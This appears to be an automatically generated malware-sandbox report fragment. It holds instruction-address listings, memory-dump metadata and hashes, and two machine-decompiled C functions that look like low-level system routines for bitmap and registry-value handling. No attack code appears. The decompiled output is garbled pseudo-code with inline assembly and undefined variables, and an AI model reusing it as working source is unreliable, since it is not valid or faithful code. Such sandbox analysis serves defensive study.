                                                                                                                                          0x03ca26b2
                                                                                                                                          0x03ca26c0
                                                                                                                                          0x03ca26c6
                                                                                                                                          0x03ca26c9
                                                                                                                                          0x03ca26d1
                                                                                                                                          0x03ca26d4
                                                                                                                                          0x03ca26e2
                                                                                                                                          0x03ca26ea
                                                                                                                                          0x03ca26ed
                                                                                                                                          0x03ca26f1
                                                                                                                                          0x03ca26f6
                                                                                                                                          0x03ca26f9
                                                                                                                                          0x03ca2707
                                                                                                                                          0x03ca270d
                                                                                                                                          0x03ca2710
                                                                                                                                          0x03ca2713
                                                                                                                                          0x03ca2718
                                                                                                                                          0x03ca271d
                                                                                                                                          0x03ca271d
                                                                                                                                          0x03ca2722
                                                                                                                                          0x03ca2750
                                                                                                                                          0x03ca2758
                                                                                                                                          0x03ca275d
                                                                                                                                          0x03ca2760
                                                                                                                                          0x03ca2766
                                                                                                                                          0x03ca2769
                                                                                                                                          0x03ca276e
                                                                                                                                          0x03ca2771
                                                                                                                                          0x03ca2777
                                                                                                                                          0x03ca277d
                                                                                                                                          0x03ca2783
                                                                                                                                          0x03ca2791
                                                                                                                                          0x03ca27a7
                                                                                                                                          0x03ca27a9
                                                                                                                                          0x03ca27ab
                                                                                                                                          0x03ca27ab
                                                                                                                                          0x03ca27b1
                                                                                                                                          0x03ca27b4
                                                                                                                                          0x03ca27b4
                                                                                                                                          0x03ca27bc
                                                                                                                                          0x03ca27bf
                                                                                                                                          0x03ca27c2
                                                                                                                                          0x03ca27c2
                                                                                                                                          0x03ca27db
                                                                                                                                          0x03ca27df
                                                                                                                                          0x03ca27e5
                                                                                                                                          0x03ca27e8
                                                                                                                                          0x03ca27f0
                                                                                                                                          0x03ca27ff
                                                                                                                                          0x03ca27ff
                                                                                                                                          0x03ca27f2
                                                                                                                                          0x03ca27f4
                                                                                                                                          0x03ca27f4
                                                                                                                                          0x03ca281a
                                                                                                                                          0x03ca2824
                                                                                                                                          0x03ca2826
                                                                                                                                          0x03ca2834
                                                                                                                                          0x03ca2843
                                                                                                                                          0x03ca2858
                                                                                                                                          0x03ca2858
                                                                                                                                          0x03ca2866
                                                                                                                                          0x03ca2866
                                                                                                                                          0x03ca2873

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 87d19eab15a4ea75cf506ade58f441b78c5aa97b15fcd0663c1a22c1561dde9b
                                                                                                                                          • Instruction ID: b9ded822a709b35dd22fd74845d1d90955f2cb6fc7e2a3682de74927d10d3e9d
                                                                                                                                          • Opcode Fuzzy Hash: 87d19eab15a4ea75cf506ade58f441b78c5aa97b15fcd0663c1a22c1561dde9b
                                                                                                                                          • Instruction Fuzzy Hash: 46811672E105159FCB18CF7DC8906BEBBF2FF88315B1A86A9D851EB285DA30D901CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA1D55 Relevance: .2, Instructions: 226COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                          			E03CA1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x3cb1070);
				E03C2D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E03CA337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E03CA33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E03C196E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E03CA33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E03C0E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x3cc5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E03C0DFDF(_t91, 1, _t142);
					}
					return E03C2D0D1(_t103);
				}
			}





































                                                                                                                                          0x03ca1d55
                                                                                                                                          0x03ca1d55
                                                                                                                                          0x03ca1d57
                                                                                                                                          0x03ca1d5c
                                                                                                                                          0x03ca1d63
                                                                                                                                          0x03ca1d66
                                                                                                                                          0x03ca1d69
                                                                                                                                          0x03ca1d6c
                                                                                                                                          0x03ca1d6e
                                                                                                                                          0x03ca1d71
                                                                                                                                          0x03ca1d74
                                                                                                                                          0x03ca1d77
                                                                                                                                          0x03ca1d7a
                                                                                                                                          0x03ca1d7d
                                                                                                                                          0x03ca1d82
                                                                                                                                          0x03ca1d85
                                                                                                                                          0x03ca1d88
                                                                                                                                          0x03ca1d8d
                                                                                                                                          0x03ca1d90
                                                                                                                                          0x03ca1d94
                                                                                                                                          0x03ca1d96
                                                                                                                                          0x03ca1d98
                                                                                                                                          0x03ca1d98
                                                                                                                                          0x03ca1d9b
                                                                                                                                          0x03ca1d9e
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1da1
                                                                                                                                          0x03ca1da5
                                                                                                                                          0x03ca1e78
                                                                                                                                          0x03ca1e78
                                                                                                                                          0x03ca1e82
                                                                                                                                          0x03ca1e87
                                                                                                                                          0x03ca1e8a
                                                                                                                                          0x03ca1e8d
                                                                                                                                          0x03ca1e92
                                                                                                                                          0x03ca1e95
                                                                                                                                          0x03ca1e98
                                                                                                                                          0x03ca1e9b
                                                                                                                                          0x03ca1ede
                                                                                                                                          0x03ca1ee3
                                                                                                                                          0x03ca1ee8
                                                                                                                                          0x03ca1ef2
                                                                                                                                          0x03ca1ef2
                                                                                                                                          0x03ca1ef5
                                                                                                                                          0x03ca1ef8
                                                                                                                                          0x03ca1efe
                                                                                                                                          0x03ca1f03
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f09
                                                                                                                                          0x03ca1f0c
                                                                                                                                          0x03ca1f0e
                                                                                                                                          0x03ca1f11
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f17
                                                                                                                                          0x03ca1f17
                                                                                                                                          0x03ca1f1a
                                                                                                                                          0x03ca1f31
                                                                                                                                          0x03ca1f34
                                                                                                                                          0x03ca1f3f
                                                                                                                                          0x03ca1f42
                                                                                                                                          0x03ca1f45
                                                                                                                                          0x03ca1f47
                                                                                                                                          0x03ca1f4a
                                                                                                                                          0x03ca1f4d
                                                                                                                                          0x03ca1f4f
                                                                                                                                          0x03ca1f63
                                                                                                                                          0x03ca1f65
                                                                                                                                          0x03ca1f67
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f69
                                                                                                                                          0x03ca1f69
                                                                                                                                          0x03ca1f72
                                                                                                                                          0x03ca1f72
                                                                                                                                          0x03ca1f75
                                                                                                                                          0x03ca1f77
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f6e
                                                                                                                                          0x03ca1f70
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f70
                                                                                                                                          0x03ca1f83
                                                                                                                                          0x03ca1f83
                                                                                                                                          0x03ca1f85
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f85
                                                                                                                                          0x03ca1f51
                                                                                                                                          0x03ca1f53
                                                                                                                                          0x03ca1f5a
                                                                                                                                          0x03ca1f5c
                                                                                                                                          0x03ca1f87
                                                                                                                                          0x03ca1f87
                                                                                                                                          0x03ca1f87
                                                                                                                                          0x03ca1f8b
                                                                                                                                          0x03ca1f8d
                                                                                                                                          0x03ca1f90
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f90
                                                                                                                                          0x03ca1f1c
                                                                                                                                          0x03ca1f1c
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f22
                                                                                                                                          0x03ca1f22
                                                                                                                                          0x03ca1f25
                                                                                                                                          0x03ca1f28
                                                                                                                                          0x03ca1f97
                                                                                                                                          0x03ca1f97
                                                                                                                                          0x03ca1f9d
                                                                                                                                          0x03ca1fa7
                                                                                                                                          0x03ca1faa
                                                                                                                                          0x03ca1fb1
                                                                                                                                          0x03ca1fb9
                                                                                                                                          0x03ca1fbd
                                                                                                                                          0x03ca1fbe
                                                                                                                                          0x03ca1fc0
                                                                                                                                          0x03ca1f2a
                                                                                                                                          0x03ca1f93
                                                                                                                                          0x03ca1f93
                                                                                                                                          0x03ca1f95
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1f95
                                                                                                                                          0x03ca1f28
                                                                                                                                          0x03ca1f1c
                                                                                                                                          0x03ca1f1a
                                                                                                                                          0x03ca1f11
                                                                                                                                          0x03ca1e9d
                                                                                                                                          0x03ca1ea0
                                                                                                                                          0x03ca1eae
                                                                                                                                          0x03ca1eb4
                                                                                                                                          0x03ca1ebc
                                                                                                                                          0x03ca1ebc
                                                                                                                                          0x03ca1ec2
                                                                                                                                          0x03ca1ec8
                                                                                                                                          0x03ca1ecd
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1ed3
                                                                                                                                          0x03ca1ed3
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1ed3
                                                                                                                                          0x03ca1ecd
                                                                                                                                          0x03ca1dab
                                                                                                                                          0x03ca1dab
                                                                                                                                          0x03ca1db1
                                                                                                                                          0x03ca1db3
                                                                                                                                          0x03ca1db9
                                                                                                                                          0x03ca1dbf
                                                                                                                                          0x03ca1dc2
                                                                                                                                          0x03ca1dda
                                                                                                                                          0x03ca1ddd
                                                                                                                                          0x03ca1de0
                                                                                                                                          0x03ca1de9
                                                                                                                                          0x03ca1dec
                                                                                                                                          0x03ca1def
                                                                                                                                          0x03ca1df1
                                                                                                                                          0x03ca1df3
                                                                                                                                          0x03ca1e0a
                                                                                                                                          0x03ca1e0c
                                                                                                                                          0x03ca1e0e
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e10
                                                                                                                                          0x03ca1e10
                                                                                                                                          0x03ca1e13
                                                                                                                                          0x03ca1e16
                                                                                                                                          0x03ca1e16
                                                                                                                                          0x03ca1e19
                                                                                                                                          0x03ca1e1c
                                                                                                                                          0x03ca1e1e
                                                                                                                                          0x03ca1e20
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e22
                                                                                                                                          0x03ca1e24
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e26
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e26
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e24
                                                                                                                                          0x03ca1e30
                                                                                                                                          0x03ca1e30
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e30
                                                                                                                                          0x03ca1df5
                                                                                                                                          0x03ca1df7
                                                                                                                                          0x03ca1e01
                                                                                                                                          0x03ca1e32
                                                                                                                                          0x03ca1e34
                                                                                                                                          0x03ca1e36
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e36
                                                                                                                                          0x03ca1dc4
                                                                                                                                          0x03ca1dc4
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1dc6
                                                                                                                                          0x03ca1dc6
                                                                                                                                          0x03ca1dc9
                                                                                                                                          0x03ca1dcf
                                                                                                                                          0x03ca1dd1
                                                                                                                                          0x03ca1e38
                                                                                                                                          0x03ca1e38
                                                                                                                                          0x03ca1e38
                                                                                                                                          0x03ca1e38
                                                                                                                                          0x03ca1dc4
                                                                                                                                          0x03ca1dbb
                                                                                                                                          0x03ca1dbb
                                                                                                                                          0x03ca1dbb
                                                                                                                                          0x03ca1dbb
                                                                                                                                          0x03ca1e3a
                                                                                                                                          0x03ca1e3a
                                                                                                                                          0x03ca1e3d
                                                                                                                                          0x03ca1e40
                                                                                                                                          0x03ca1e43
                                                                                                                                          0x03ca1e6f
                                                                                                                                          0x03ca1fc7
                                                                                                                                          0x03ca1fc7
                                                                                                                                          0x03ca1e75
                                                                                                                                          0x03ca1e75
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1e75
                                                                                                                                          0x03ca1e6f
                                                                                                                                          0x03ca1fca
                                                                                                                                          0x03ca1fca
                                                                                                                                          0x03ca1fce
                                                                                                                                          0x03ca1fd0
                                                                                                                                          0x03ca1fd0
                                                                                                                                          0x03ca1fd3
                                                                                                                                          0x03ca1fd9
                                                                                                                                          0x03ca1fde
                                                                                                                                          0x03ca1fe4
                                                                                                                                          0x03ca1fe4
                                                                                                                                          0x03ca1fee
                                                                                                                                          0x03ca1fee

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 021740c3469236773462a5c9e97aba1eb050c36a3de73f32588eb4da3a465f54
                                                                                                                                          • Instruction ID: deff01ec62981f3d41ae97d51b565b9ec334aea6190b6bbc1209745c88db0873
                                                                                                                                          • Opcode Fuzzy Hash: 021740c3469236773462a5c9e97aba1eb050c36a3de73f32588eb4da3a465f54
                                                                                                                                          • Instruction Fuzzy Hash: 32815B35E0065A8FCF18CFA9C8909ECB7B2BF49318F184269E412EF395DB319A45CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDC600 Relevance: .2, Instructions: 225COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                          			E03BDC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x3ccd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03BE6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E03C1B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3cc7b9c; // 0x0
					_t74 = L03BF4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03C19650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L03BF77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E03C1F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E03C113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L03BF77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03C19650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                                                          0x03bdc608
                                                                                                                                          0x03bdc615
                                                                                                                                          0x03bdc625
                                                                                                                                          0x03bdc62d
                                                                                                                                          0x03bdc635
                                                                                                                                          0x03bdc640
                                                                                                                                          0x03bdc680
                                                                                                                                          0x03bdc687
                                                                                                                                          0x03bdc688
                                                                                                                                          0x03bdc689
                                                                                                                                          0x03bdc694
                                                                                                                                          0x03bdc694
                                                                                                                                          0x03bdc642
                                                                                                                                          0x03bdc64a
                                                                                                                                          0x03bdc697
                                                                                                                                          0x03c47a25
                                                                                                                                          0x03c47a2b
                                                                                                                                          0x03c47a2e
                                                                                                                                          0x03c47a30
                                                                                                                                          0x03c47bea
                                                                                                                                          0x03c47bea
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47bea
                                                                                                                                          0x03c47a36
                                                                                                                                          0x03c47a43
                                                                                                                                          0x03c47a48
                                                                                                                                          0x03c47a4c
                                                                                                                                          0x03c47a4e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47a58
                                                                                                                                          0x03c47a5a
                                                                                                                                          0x03c47a5b
                                                                                                                                          0x03c47a5c
                                                                                                                                          0x03c47a5d
                                                                                                                                          0x03c47a63
                                                                                                                                          0x03c47a64
                                                                                                                                          0x03c47a6a
                                                                                                                                          0x03c47a6c
                                                                                                                                          0x03c47a6e
                                                                                                                                          0x03c479cb
                                                                                                                                          0x03c479cb
                                                                                                                                          0x03c479ce
                                                                                                                                          0x03c479d0
                                                                                                                                          0x03c47a98
                                                                                                                                          0x03c47a9b
                                                                                                                                          0x03c47a9b
                                                                                                                                          0x03c47a9e
                                                                                                                                          0x03c47aa1
                                                                                                                                          0x03c47bbe
                                                                                                                                          0x03c47bbe
                                                                                                                                          0x03c47bc0
                                                                                                                                          0x03c47be0
                                                                                                                                          0x03c47be0
                                                                                                                                          0x03c47a01
                                                                                                                                          0x03c47a01
                                                                                                                                          0x03c47a05
                                                                                                                                          0x03c47a07
                                                                                                                                          0x03c47a15
                                                                                                                                          0x03c47a15
                                                                                                                                          0x03c47a1a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47a1a
                                                                                                                                          0x03c47bc2
                                                                                                                                          0x03c47bc6
                                                                                                                                          0x03c47bc9
